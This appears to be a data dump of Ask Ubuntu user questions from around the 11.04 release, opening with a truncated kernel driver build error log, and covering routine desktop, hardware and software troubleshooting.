‘set_module_owner’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:621:12 : error : ‘struct net_device’ has no member named ‘priv’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c : in function ‘r1000_init_one’ : /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:783:12 : error : ‘struct net_device’ has no member named ‘priv’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:794:5 : error : ‘struct net_device’ has no member named ‘open’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:795:5 : error : ‘struct net_device’ has no member named ‘hard_start_xmit’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:796:5 : error : ‘struct net_device’ has no member named ‘get_stats’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:797:5 : error : ‘struct net_device’ has no member named ‘stop’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:798:5 : error : ‘struct net_device’ has no member named ‘tx_timeout’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:799:5 : error : ‘struct net_device’ has no member named ‘set_multicast_list’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:816:12 : error : ‘struct net_device’ has no member named ‘priv’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c : in function ‘r1000_open’ : /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:1052:34 : error : ‘struct net_device’ has no member named ‘priv’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:1064:51 : error : ‘sa_shirq’ undeclared ( first use in this function ) /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:1064:51 : note : each undeclared identifier is reported only once for each function it appears in /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:1064:2 : warning : passing argument 2 of ‘request_irq’ from incompatible pointer type /usr/src/linux-2.6.34.7-0.4/include/linux/interrupt.h:122:1 : note : expected ‘irq_handler_t’ but argument is of type ‘enum irqreturn_t ( * ) ( int , void * , struct pt_regs * ) ’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c : in function ‘r1000_hw_phy_reset’ : /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:1140:34 : error : ‘struct net_device’ has no member named ‘priv’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c : in function ‘r1000_hw_phy_config’ : /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:1168:34 : error : ‘struct net_device’ has no member named ‘priv’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c : in function ‘r1000_hw_start’ : /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:1244:34 : error : ‘struct net_device’ has no member named ‘priv’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c : in function ‘r1000_init_ring’ : /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:1399:34 : error : ‘struct net_device’ has no member named ‘priv’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c : in function ‘r1000_tx_timeout’ : /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:1475:34 : error : ‘struct net_device’ has no member named ‘priv’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c : in function ‘r1000_start_xmit’ : /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:1508:34 : error : ‘struct net_device’ has no member named ‘priv’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c : in function ‘r1000_interrupt’ : /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:1749:34 : error : ‘struct net_device’ has no member named ‘priv’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c : in function ‘r1000_close’ : /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:1812:34 : error : ‘struct net_device’ has no member named ‘priv’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c : in function ‘r1000_set_rx_mode’ : /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:1914:34 : error : ‘struct net_device’ has no member named ‘priv’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c : in function ‘r1000_get_stats’ : /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:1980:34 : error : ‘struct net_device’ has no member named ‘priv’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c : in function ‘r1000_init_module’ : /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:2009:2 : error : implicit declaration of function ‘pci_module_init’ make [ 5 ] : *** [ /root/downloads/tg-3269_100628/r1000/src/r1000_n.o ] error 1 make [ 4 ] : *** [ _module_/root/downloads/tg-3269_100628/r1000/src ] error 2 make [ 3 ] : *** [ sub-make ] error 2 make [ 2 ] : *** [ all ] error 2 make [ 2 ] : leaving directory `/usr/src/linux-2.6.34.7-0.4-obj/i386/default' make [ 1 ] : *** [ modules ] error 2 make [ 1 ] : leaving directory `/root/downloads/tg-3269_100628/r1000/src' make : *** [ modules ] error 2
39173	can not install vmware-tools	i encounter this error : the path `` /usr/src/linux/include '' is not an existing directory .
39176	backlight on/off button does n't work on an asus eee pc 1005hab	i 've got an asus eee pc 1005hab , and after upgrading to 11.04 i can no longer use fn+f7 to turn on/off the screen backlight . the other fn+fx keys i 've tried so far all work . is there some standard fix , or should i report this ? a quick google search did n't turn up anything .
39177	what program currently handles the old notification area ?	with the removal of notification-area , what program now handles those few applications still using it ? my use case is the following : i have a legacy application in my start up applications that requires the notification area to be running before it can start up ( otherwise i get an error about no system tray being around ) . therefor i had written a little bash script that checked every few seconds whether notification-area was already in the running programs and if so , it would start up the program . what program would be the new one to check for ? ps : i realize i could also add a sleep for x seconds and then just run the program regardless , but i see that as an ugly workaround . note : this question is n't about allowing the icon to be shown , i have set that setting to all the first day i started using unity . this is about my program starting up before the program that handles the notification area and thus failing because there is simply no systray yet .
39179	how do i toggle the graphical desktop ( gdm ) ?	i am using ubuntu 10.10 desktop , but i need to shut off graphic window ( gdm ) and and make it alive when a need it , how can i do that ? thanks in advance rick
39180	pdf to mobi convertor	is there any application in natty which can convert a pdf file into a mobi file ?
39188	mouse and keyboard stop working after suspend or screensaver lock	if i leave the computer and let it run into screensaver and lock the screen , the mouse left click wo n't go back to work . if i suspend the computer , the keyboard wo n't get back to work . it started after upgrading to ubuntu 11.04 . any tips to solve this problem ? the follwing lines i got on dmesg after the problem happened [ 30536.564415 ] psmouse.c : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 30536.565725 ] psmouse.c : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 30536.568466 ] psmouse.c : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 30536.569790 ] psmouse.c : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 30536.571123 ] psmouse.c : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 30536.571126 ] psmouse.c : issuing reconnect request and that after i tried to plug again my usb mouse : [ 31570.040088 ] usb 6-1 : usb disconnect , address 2 [ 31573.490095 ] usb 6-1 : new low speed usb device using uhci_hcd and address 3 [ 31573.687376 ] input : microsoft basic optical mouse as /devices/pci0000:00/0000:00:1d.1/usb6/6-1/6-1:1.0/input/input12 [ 31573.687544 ] generic-usb 0003:045e:0084.0002 : input , hidraw0 : usb hid v1.10 mouse [ microsoft basic optical mouse ] on usb-0000:00:1d.1-1/input0
39191	how can i add gnome-shell to the regular ubuntu natty login screen along with `` ubuntu '' `` ubuntu classic '' , maybe as `` user defined '' ?	how can i add gnome-shell to the regular ubuntu natty login screen along with `` ubuntu '' `` ubuntu classic '' , maybe as `` user defined '' ? when i pick the user name on login screen , at the bottom there is a drop-down to pick the session i want to start , i would like to add the gnome-shell i compiled myself to that list of options . thanks
39194	webdav with apache only working with ubuntu client	webdav ( via ssl ) is configured on a virtualhost on my root-server . ssl is working fine with all clients and other applications running below this virtual host are working . unfortunately webdav does not . nautilus as client works well , cadaver as client works only on some ( php ) files , not on all . an old internet explorer 6 is working as well , but recent clients on mac os x and windows do not work . both dav-modules are enabled , files and directories are owned by www-data : www-data and the following excerpt is part of my config ( anonymized ) . namevirtualhost 1.2.3.4:443 < virtualhost 1.2.3.4:443 > servername server.example.com [ ... ] # webdav davlockdb /srv/dav/lockdb [ ... ] alias /serendipity `` /srv/www/webdav '' < directory `` /srv/www/webdav '' > dav on forcetype text/plain options +indexes allowoverride none authtype basic authname `` serendipity testblog '' authuserfile /srv/pwd/serendipity require valid-user < /directory > [ ... ] < /virtualhost > any ideas ?
39199	how to change console title ?	on windows i have command title new title name is it possible on ubuntu ?
39200	how to search for files containing specific word ?	how to search for files containing specific word ?
39203	why ca n't gnome-do find my files ?	i use a handful of files fairly often but gnome-do can never seem to find them . documents/foo/infrastructure/cheat-sheet.txt never comes up when i type `` cheat-sheet '' though it is right there if i do locate cheat-sheet and i have no trouble bringing up the directory it is in ( `` infra ... '' and it is right there ) . what might be going on ? needless to say , this is kind of annoying .
39205	how do i change the command that a launcher item launches ?	i 'm not sure what commands are issued when trying to launch a program from the dash . how can i determine this and modify the commands of these short cuts ? for example , i would like to change the command to launch skype from : skype to ld_preload=/usr/lib32/libv4l/v4l1compat.so skype i 'm not sure which command is issued when i click on the icon in the dash and i 'm not sure how i would change it . changing it using gnome menu editor does not seem to have any effect .
39208	`` aero snap '' -animation not working correctly on the right side of the screen	when using the `` aero snap '' -feature on the right side of screen the animation does n't fill up the complete screen height , only if the mouse pointer is at the very top of the right side of screen . otherwise the animation box moves vertically as the mouse is moved along the edge of the screen , this does not happen on the other sides of the screen . i thought about submitting a bug but the bug program advised me to ask here first .
39209	is there any hope of recovering this installation ?	i have a laptop that gets very hot and when it overheats it shuts down abruptly . by sod 's law this happened while i was updating to 11.04 ( during the install phase , somewhere in the lib* section , so probably the worst time ) . when i try to boot into ubuntu now it can not find the root filesystem , ( i get the option to wait , skip mounting or enter a root terminal ) . my laptop 's keyboard has also decided not to work ( this has happened before and it eventually came back , although i do think it 's time for a new laptop ) - luckily usb continues to work . i am able to boot into my windows partition so i can assume the hard drive is n't smashed . my question is how screwed is my ubuntu install ? i have quite a lot of data on the ubuntu partition - is this lost or will i be able to access it via a live cd ? how would i go about manually locating the filesystem in the root terminal ? i do n't mind reinstalling , but getting the data first is very important ( yes , backup is quickly going to be sorted out , damned hindsight ) .
39213	selective screenshot using < super > +button1 is overlayed with blue color	the screen shot plugin enabled from compiz config settings manager does n't work properly . the screen shots of the selected areas get overshadowed with blue color.. not as clear of a screen shot as i would get in previous ubuntu versions .
39217	unlock keyring with fingerprint reader on login	i recently bought a lenovo thinkpad edge e420s , which comes with a fingerprint reader . i have installed the fingerprint-gui and libbsapi to get it fully working ( make : upek ) . is there a way to unlock the keyring on login using the fingerprint reader ? apparently you can get it working by setting a blank password when using thinkfinger , but that 's not an option for me . running lsusb in the terminal returns bus 001 device 003 : id 147e:1002 upek
39218	can 32 bit use hdmi ?	i want to buy a desktop , and use ubuntu with it . my question is : can i have a 32 bit computer with hdmi ? also , will it be beneficial to purchase a 64 bit computer , when it comes to ubuntu ?
39221	unity launcher not shown	i have installed ubuntu 11.04 and tried login . everything worked fine . then i installed compiz config settings manager . and i do not know what i have changed , now i do not see unity launcher when logged into ubuntu . when i login in classic mode i see all panels and tasks , but when logged in unity mode , i do not see any think except the files on desktop . thank you surya
39231	how can i add an internet radio station to banshee ?	how can i add an internet radio station to banshee ?
39235	how do i set the default icon for mplayer ?	the mplayer that i installed from the repos does not have a default icon associated with it . hence in the the alt-tab window or in the unity launcher , or any place which requires an icon , it is either empty or an icon with a question mark is shown . how do i assign an icon that will be associated with mplayer ?
39236	how do i use my /home partition from kubuntu in xubuntu ?	i had installed kubuntu with separated /home directory ( it was on separeted partition ) . now i tryied reinstall it to xubuntu ( was changed only / mountpoint and swap area ) . i need use my old /home dir from kubuntu in new installation of xubuntu . how i mount this fs to system instead ? in filemanager i see it like 10gb filesystem ( inside is my home folder and folder structure from my last usage of this ) thanks michell
39237	how to import rhythmbox podcasts into banshee ?	with natty , the default music-player changed from rhythmbox to banshee . while my music seems to have moved along , the podcasts did n't . i have therefore two questions : how can i listen the podcasts i downloaded with rhythmbox from banshee ? how can i ask banshee to automatically download the podcasts rhythmbox was downloading for me ? edited to add a clarification : i 'm interested in a way to subscribe to all the podcasts i was subscribed to in rhythmbox . i 'm asking this question because i 'd prefer not to subscribe to the podcasts one by one .
39238	just upgraded to 11.04 form 10.10 . it hangs after boot and just new desktop is shown	i just upgraded to ubuntu 11.04 from 10.10 using direct internet connection and now just new looking desktop ( with the launcher on the left ) is shown and system hangs . mouse cursor is moving but clicking icons and keyboard shortcuts have no effect . maybe something went wrong during upgrade procedure . you know , it did not finished correctly ; at the last seconds of installing upgrades it gave an error saying `` it can not acquire lock '' and exited . i just manually clicked `` restart to complete upgrade '' from the menu . i run the upgrade routine again but it says the system is upgraded . no shortcut key works , ( i hit win key or alt+f2 but the result is nothing ) . yes , caps lock is working . i mean that when i press it the caps lock light turns on ) . i am sure that there is no special process that makes cpu busy , mouse cursor is moving so fast and my cpu fans are in normal mode and does not make loud noise . i boot in recovery mode and typed the upgrade command and as i said it says that the system is already upgraded . you know , the situation is very similar to a state that you have a window in front and clicking items in the background has no result . i haven`t installed ubuntu from wubi .
39240	problems transferring great amount of data to sd card of android phone	i have a htc desire rooted with cyanogenmod 7 and a 16gb microsd card . when i copy great amount of data from ubuntu 10.04 64 bits to this phone via usb , the speed is low ( ~1'2 mib/seg ) and sometimes the system does n't respond during copy process . it 's very difficult determine where is the problem . any clue ?
39243	can i switch from 64bit to 32bit ?	is their anyway i can switch from ubuntu 64-bit to ubuntu 32-bit easily without replacing the whole os .
39248	can not install xubuntu 11.04 because of `` signal out of range ''	just grab iso from official site , burnt it on a cd , tried to install , after the first language selection menu , monitor turned black with message : `` signal out of range '' . what can i do , especially , can i do something right there , without burning new iso , because i 'm currently out of blank cds , will i have this kind of problems after the installation ? please help !
39257	ubuntu 11.04 and ati drivers , hd4850	i have problems with ati drivers for my graphics hd4850 . opensource drivers work , but oftem lag mouse and other applications . then i 've installed additional drivers , which are include in ubuntu . it 's good with mouse and other , but sometimes lag applications and moving windows . in ccsm i disabled vsync and set refresh rate , but it 's still lag on applications , moving windows is ok. what can i do now ? is ati driver version from additional drivers same as 11.4 from official amd 's webpage ? if i will install drivers version 11.4 from amd 's page , will work good ? or how can i solve problems with opensource drivers with mouse and applications lagg ? thanks for all replies and informations ! greetings , echoman : )
39258	nvidia graphics problem with suspend and resume , system hangs	am on 11.04 . when i close my laptop lid ( nvidia graphics - hp pavilion ) it goes onto sleep mode . but when i reopen it , instead of resuming onto the password prompt , it shows me a screen of random blocky colours - typically largely yellow . i have to do a hard reset to restart the pc . here is an image i took of the problem : would file it on launchpad but not sure if it is a bug or isolated . thanks for any help .
39259	lirc is conflicted by some default ir-controlling module so that it only sends keyboard input	i 've tried to find a solution for this problem for some time . apparently natty loads some default modules for handling ir-input and sends them as keyboard input instead of the lirc event i want . this makes my remote useless in xbmc ( media center program ) since i can not use it for anything else than navigation . a proposed solution is in this bug report ( https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/766647 ) but it is regarding a mce remote and it does n't work for my antec veris rm200 . until the ubuntu-devs make a permanent fix please tell me how to unload all the conflicting modules ? these are the modules which are loaded on my system : lirc_imon vesafb nls_iso8859_1 nls_cp437 vfat fat snd_hda_codec_hdmi snd_hda_codec_realtek rt2860sta arc4 snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_seq_midi snd_rawmidi snd_seq_midi_event rt2800pci rt2800lib crc_ccitt ir_lirc_codec snd_seq lirc_dev rt2x00pci ir_sony_decoder ir_jvc_decoder ir_rc6_decoder snd_timer snd_seq_device fglrx edac_core rc_imon_pad rt2x00lib edac_mce_amd mac80211 serio_raw ir_rc5_decoder imon ir_nec_decoder rc_core k10temp cfg80211 eeprom_93cx6 snd vice sp5100_tco i2c_piix4 soundcore snd_page_alloc xhci_hcd shpchp lp parport usb_storage firewire_ohci firewire_core usbhid hid uas crc_itu_t para_jmicron r8169 ahci libahci can anyone help me out ? i just want lirc to work correctly which should n't be hard . i just need to know which modules to unload .
39260	internet filter for ubuntu ?	is there anti filter program for internet and some websites in ubuntu ?
39261	close windows with middle click in preview pane ( super-w )	i am using 11.04 with unity . when i press super-w , the previews of open windows align on the screen . if i click one of them , it attains focus . i used to have this enabled as a compiz plugin in ccsm ( not sure which one ) , but back then middle clicking on a window preview would close that window . very useful . how can i have middle-clicking close the preview i middle clicked in the super-w pane ?
39266	problem when installing pear packages for php	when trying to install pear packages i get the following error : sudo pear install validate [ sudo ] password for nicolas : php fatal error : call to undefined method pear : :raiseerro ( ) in /usr/share/php/pear/rest.php on line 165 this pear : :raiseerro ( ) seems to be the problem .
39268	what can i use like a replacement of the notification area ?	well , i used both codes below , also i used dconf-editor to tweak the panel . i tried to set the code to one program or two , and 'all ' . but the problem is that sometimes ( not always ) i ca n't click on the sound indicator or network manager or any indicator ( except the me menu , the messaging menu , and the shutdown menu ) . gsettings set com.canonical.unity.panel systray-whitelist `` [ 'all ' ] '' gsettings set com.canonical.unity.panel systray-whitelist `` [ 'javaembeddedframe ' , 'mumble ' , 'wine ' , 'skype ' , 'hp-systray ' , 'your_application ' ] '' so i want something to replace this problem please . any suggestion ?
39275	only show current workspace applications in avant window navigator	in awn is it possible to only show applications that are on the current workspace ? i know its possible in docky , but ca n't find any config for awn .
39276	how can i make a quicklist for empathy to start a conversation with a certain `` friend '' ?	i would like to create a quicklist for empathy including links to certain msn and facebook `` friends '' of mine . i already know how to make quicklists , i just need the command i have to use in order to start a chat window with a certain user .
39277	what version of ubuntu can i install and use in the current situation when 11.04 even not installable ( `` monitor out of range '' ) ?	because of all that problems with 11.04 , what ubuntu distribution is it safe to install ? or maybe some other linux distros .
39281	how to run an application using sudo without a password ?	... but still be required for applications that need admin privilegies ? in order to allow the following : $ apache2ctl restart httpd not running , trying to start ( 13 ) permission denied : make_sock : could not bind to address 0.0.0.0:80 no listening sockets available , shutting down unable to open logs $ sudo ! ! sudo apache2ctl restart # no password asked $ # works ! for reference i 've seen this setup on amazon 's e3 instances any idea ?
39282	nautilus and ubuntu one problems	nautilus wo n't start when i log in , the cpu usage is high without showing what 's using it . after killing the nautilus processes a couple of times it starts working again . i got problems with ubuntu one too . `` file sync error . ( org.freedesktop.dbus.error.noreply : message did not receive a reply ( timeout by message bus ) ) '' . and , the sync option in folders is gone . both errors appeared at the same time . i 've tried to update , but no updates is available .
39285	ca n't download in software centre	i am trying to download packages using software centre on 11.04 but i keep getting the message : '' failed to download package files check internet connection '' though my internet connection works fine on firefox . can anyone help ? thanks !
39286	xfce focus window on cycle ( alt-tab )	i just installed xubuntu natty . i would like to focus windows as i cycle using alt-tab . reason being , i may have 5 of the same windows open on a workspace , and i need to visually see which one i will be selecting . is there a way to do this ?
39292	how to get wlan0 rate from cli	question is in title , best would be from some file in /sys instead of parsing output of iwlist ? i need this number from output of iwconfig `` bit rate=54 mb/s '' . thanks
39301	wubi-move-to-partition worked but did n't install the bootloader , what do i do ?	i am on ubuntu 10.10 and installed it through wubi . but the script exited at copying var/tmp . i do not have the exact error message but it said that some files were deleted before they could be transfered . i was confused so i restarted the computer . now the computer still books into wubi but i can not reuse the script as it says that the partition i am moving to is in use . sudo ./wubi-move-to-partition /dev/sda7 /dev/sda6 sanity checks ... volume /dev/sda7 is in use . aborting what do i do now ?
39303	resume from suspend fails on samsung x360 laptop	i just upgraded to natty and after the upgrade on the laptop suspend is no longer working as before . before 11.04 i closed the lid , the laptop powered down . when i opened the lid and pressed the power button for a short time it would power up again and i could log in and continue working . now there are 2 problems : a ) no power down on lid closed ( i am using the 'suspend ' from the menu - no idea what this is called in unity - > upper right corner in the panel ) . update : it does power down i found out it just takes a very long time to trigger ( 30 seconds or longer ) b ) much worse : no power up after suspend . i need to turn off the laptop completely and reboot . i checked and all tools that i know of are installed : acpi-support , laptop-mode-tools , pm-tools i have no idea how this could be fixed . the laptop is a samsung x360 if that helps any . i am not using any proprietary graphics drivers . ( i think the graphics card is intel based ) update : i found the following line in several logfiles in /var/log may 8 09:34:40 mylaptop kernel : [ 1.095713 ] i2c-core : driver [ adp5520 ] using legacy suspend method update 2 : this is how suspend looked in /var/log/messages before natty : [ 11905.244790 ] pm : late suspend of devices complete after 32.636 msecs [ 12832.968226 ] suspending console ( s ) ( use no_console_suspend to debug ) [ 12833.232083 ] pm : suspend of drv : hda intel dev:0000:00:1b.0 complete after 119.668 msecs [ 12833.268081 ] pm : suspend of drv : sky2 dev:0000:06:00.0 complete after 159.422 msecs [ 12833.268122 ] pm : suspend of drv : pcieport dev:0000:00:1c.3 complete after 155.763 msecs [ 12833.340925 ] pm : suspend of drv : sd dev:0:0:0:0 complete after 355.982 msecs [ 12833.340964 ] pm : suspend of drv : scsi dev : target0:0:0 complete after 355.898 msecs [ 12833.340986 ] pm : suspend of drv : scsi dev : host0 complete after 355.666 msecs [ 12833.420083 ] pm : suspend of drv : ahci dev:0000:00:1f.2 complete after 308.204 msecs [ 12833.420116 ] pm : suspend of drv : dev : pci0000:00 complete after 307.034 msecs [ 12833.420146 ] pm : suspend of devices complete after 451.541 msecs [ 12833.420150 ] pm : suspend devices took 0.452 seconds [ 12833.452789 ] pm : late suspend of devices complete after 32.627 msecs current kernel running ( output from uname -a ) 2.6.38-8-generic-pae # 42-ubuntu
39309	how do i find the version of bash i am running ?	( learning bash ) i was trying to check the bash version so i typed /bin/bash -v. that outputted a whole lot of text to the screen ( contents of .bashrc , and other files sourced from it ) . could i have screwed up something ( like overwriting some config files/setting incorrect environment variables etc . ) due to that command ? i also ca n't find documentation on what the -v switch is for .
39315	how to find out if current shell was loaded by another shell ?	when i am in a terminal , and i type /bin/bash , that starts up another bash shell , right ? is it possible to find out , via some command , whether the current bash shell has been started from another bash shell ? also , what are the implications of starting a shell inside another ? ( or does it not matter )
39316	slow boot after clean install of natty	the time have risen from 20-25 sec in meerkat to 35 sec in natty . i do not know if it is ureadahead but made a bugreport of it in launchpad . i tried fedora shortly before installing natty . they use systemd instead of upstart and did n't have this slow boot . in a dmesg this jump shows up : [ 3.087606 ] ext4-fs ( sda1 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 15.292831 ] < 30 > udev [ 308 ] : starting version 167 how could it be that booting got so much worse ? i also have a `` black screen '' much longer before plymouth splash starts in natty then in meerkat . could it be the famous kernel regression ?
39317	how can i get the music from my iphone 3g to my hard drive using banshee ?	i plugged in my iphone , and it correctly detected all of my media ! : ) i can play songs and browse my files , it just worksâ˘ . now i 'd like to make a copy of all the music on my phone to my hard drive . how can i do this ? i see a sergio 's phone - > music ( 1043 ) item , and when i click my phone , i see the options to sync . but would n't this delete the information on my phone ? how can i just 'fetch ' the data to my computer ? what do you suggest ? thanks !
39320	ubuntu 12.04 how do i bind the `` scale '' and `` expo '' features of compiz to my logitech performance mx ?	i have a nice multi-button logitech performance mx and like to map my two thumb buttons to the scale and expo compiz plugins . [ please note that this has changed in ubuntu 12.10 ]
39321	where did my close , minimize , and maximize buttons go along with my panels ?	as i installed to the new 11.04 , i ran into multiple problems . first , my computer would n't boot into the new 11.04 . so it gave me a number of options to boot from and i chose and older version and booted into my oldest version that i had of ubuntu . it then booted into a version i had never seen before . the one that had the panel on the left side for the notebooks . that was the first time i had seen that panel on any of my ubuntu installations . but now that i have been able to boot into 11.04 ( i believe to be so ) my close , minimize , or maximize buttons are working showing along with all the window edges seem to be missing or not showing . and i ca n't access my panels so i ca n't go into the system settings . i have only my dock ( awn ) to guide me through . luckily , i have my browser , terminal , and system monitor on my dock . but my windows are naked and i do n't have my panels showing anymore ... i have no idea what to do ... help ?
39324	how do i sync music to my ipod ?	can anyone help me ? i want to load and unload music to the wife 's ipod but so far i have had no luck . i can see what she has on the ipod and even listen to it through my computer but i have yet to work out how to synch ' with it using banshee or ubuntu one . if anyone has any ideas for a very raw ubuntu user i would be most grateful .
39331	how do adjust the launcher slide out time to be instant ?	hello friends , i was wondering if anyone knows whether or not it is possible to instantly auto-hide the unity bar , rather then just having it slowly slide out . thanks for the eventual answer !
39336	how can i change which icon an applet uses ?	i just installed the clipboard manager diodon . sudo add-apt-repository ppa : diodon-team/stable sudo apt-get update sudo apt-get install diodon by default , it uses a dark gtk-paste icon when i use the faenza-dark icon theme . instead , i want it to use the gtk-paste icon from the faenza-darkest icon theme . but rather than replace the icon inside the theme , how can i simply tell diodon to use x icon instead ? i 've read all suggested questions before posting this , but they lean more towards replacing the icon rather than telling it to use different one .
39344	is there a way for banshee to rename a song file according to it 's tags ?	for example , i have a file called hcyd.mp3 on my music folder . if i open it in banshee i see the actual song name , artist , etc . is there a way to rename the file ( actual file name ! ) to something like : frank sinatra - my way.mp3
39345	internal mic is not working on a dell studio 1558	i made upgrade from ubuntu 10.10 to ubuntu 11.04 ( amd64 version ) at my dell studio 1558 notebook . after that internal mic is not working ( at previous version all was ok ) . but external microphone , connected to to computer is well working . how to solve this problem ?
39346	prevent accidental low-level access ( formatting ) of system disk by root ?	is it possible to prevent accidental mounting and/or reformatting of a disk or partition by the root user during normal operation of a system ? for example , this happened to me a while ago : under normal operation i have /dev/sda1 mounted as / and /dev/sdb1 mounted as /var/disk2 . on one particular day i rewrote a thumbdrive ( /dev/sdc ) with different livecd images three or four times while trying to repair another computer . one of those times i unmounted /dev/sdb1 instead of /dev/sdc1 and overwrote sdb1 with a new filesystem , by mistake . normally you have to be root to do anything with low level filesystem access on any storage device . what i 'd like is to be able to lock myself out of /dev/sda and /dev/sdb any time i 'm running the live operating system from /dev/sda1 ( as opposed to having booted from a livecd which i would never want to place any limits upon . ) update in response to loevborg ( thanks ) : i think what i really need is complete unrestricted access to /dev/sdc ( or any other device that might show up when i plug in a usb block device ) as a non-root user . is this possible -- erasing , creating a filesystem , mounting -- as non-root if i set permissions somewhere or add myself to the correct group ?
39347	after i install program with wine , i ca n't launch it due to missing dll 's . how do i add them ?	i 'm trying to install softone 's accounting program on ubuntu 11.04 , wine 1.2.2 , but when i try to launch i get a missing dll error . this is the output from the terminal : niklas @ ubuntu : ~ $ wine 'c : \program files\softone\admin6.exe' fixme : font : wineengcreatefontinstance untranslated charset 255 wine : call from 0x7bc4a440 to unimplemented function iertutil.dll.653 , aborting fixme : ntdll : rtlntstatustodoserrornoteb no mapping for 80000100 wine : call from 0x7bc4a440 to unimplemented function iertutil.dll.653 , aborting fixme : ntdll : rtlntstatustodoserrornoteb no mapping for 80000100 i found the required dll on dll-files.com but i do n't know how to get it into the wine installation so that it works as it should ... any help ? edit : i 've managed learning wine and winetricks a bit better and now i have the following error dialogues when trying to launch the application . what i wonder is if these have anything to do with a missing dependency or parts of the program itself ? ca n't create object : adocommand an exception occured failed to create object . ole returned error : h '' 80004005 '' . reason : ... exception 24 not trapped ; the class nilobject ( object reference : 00000003 ) does not understand : getdataset exception 24 not trapped ; the class nilobject ( object reference : 00000003 ) does not understand : getx exception 24 not trapped ; the class nilobject ( object reference : 00000003 ) does not understand : getm exception 24 not trapped ; the class nilobject ( object reference : 00000003 ) does not understand : getoptions exception 24 not trapped ; the class nilobject ( object reference : 00000003 ) does not understand : getcolumns exception 24 not trapped ; the class nilobject ( object reference : 00000003 ) does not understand : getfont execution error : file 'sgmen01qcx' error code : 240 , pc=0 , call=1 , seg=0 240 object reference not valid is there some way i can get someone more experienced to try to tweak the installation ?
39357	how can i update vim to a newer version than 11.04 's repo version ( 7.3.35 )	ubuntu 11.04 comes with vim 7.3.35 in the repos , and this version has a bug which is preventing me from using the command-t plugin ( the bug is http : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=614336 ) which was apparently fixed in 7.3.154 . how can i update my local vim to at least this version ? do i have to completely uninstall and build from source or is there a ppa out there somewhere i ca n't find ?
39358	why does ubuntu-bug imply that i should n't report bugs for compiz and unity ?	i run ubuntu-bug compiz . select no it 's not unity . ( although i get the same result if i report for unity . ) then i 'm presented with this question : development is completed for the 'natty ' version of ubuntu , so you should use technical support channels unless you know for certain it should be reported here ? options : i do n't know yes , i already know the fix for this problem . yes , the problem began right after doing a system software update . yes , i have gone through technical support , and they have referred me here . no , please point me to a good place to get support . `` i do n't know '' and `` no ... '' both give a dialog with links to askubuntu and ubuntu.com/support and end the bug report without sending . if i found a bug that i want to report , the only applicable yes is `` yes , the problem began after doing a system software update . '' this implies that the developers are interested in regressions , but not new bugs . my understanding was that askubuntu is for help and not for bug reports . is this dialog merely to help askubuntu to relieve the developers of technical support tasks ? ( an admirable goal , but i 'd assume users who are asked to post to au and then report the same issue to launchpad will lose enthusiasm -- perhaps it 's worth it if `` junk bugs '' are drastically reduced . ) when is something not technical support ? for context , the bug i want to report is that when using scale and switching my selection with the keyboard , chromium does not display the same selection shadow as other windows ( gnome-terminal , nautilus ) . i 'm not looking for help to find a workaround ( i can turn on window highlighting in scale add-on ) . however , i can not honestly answer yes to any of the questions .
39359	why does ubuntu one assume the files on the site are newer than the new ones on my computer ?	i recently installed 11.04 on my new computer . after i installed copies of my files from an older computer , ubuntu one insists that the files on that site are newer than the ones just installed on my new computer . i want the computer to have preeminence . why are new files i just edited deleted from my computer ? i want to back stuff up not delete it to make my computer look like what 's on ubuntu one ! -- -gk
39361	empathy does n't always receive first wlm message	does anyone knows why sometimes i do n't get the first message of a conversation with empathy when using a wlm account ? example using the wlm web messenger : someone : hi someone : how are you ? me : fine example using empathy : someone : how are you ? me : fine it happens every time , and i 'm sick of using the web messenger of wlm and empathy just to catch those missing messages . has anyone experienced something like that ? thanks in advance .
39362	system menu disappeared after upgrade	hello after upgrade to ubuntu 11 system menu on desktop has been disappeared . what can i do to solve the problem ?
39363	how do i install root-cern ?	cern 's root environment installs fine on 10.10 , and is even available in the software center , but it will not install or compile on natty because the x11 directories are in new locations . i can redefine the paths , but then i get compile errors because only gcc 4.3 is supported through root and natty uses 4.5 . i 've given up and gone back to 10.10 , but my question is , after installing root on maverick , if i upgrade back to natty , will my old software still work with these new directory paths ?
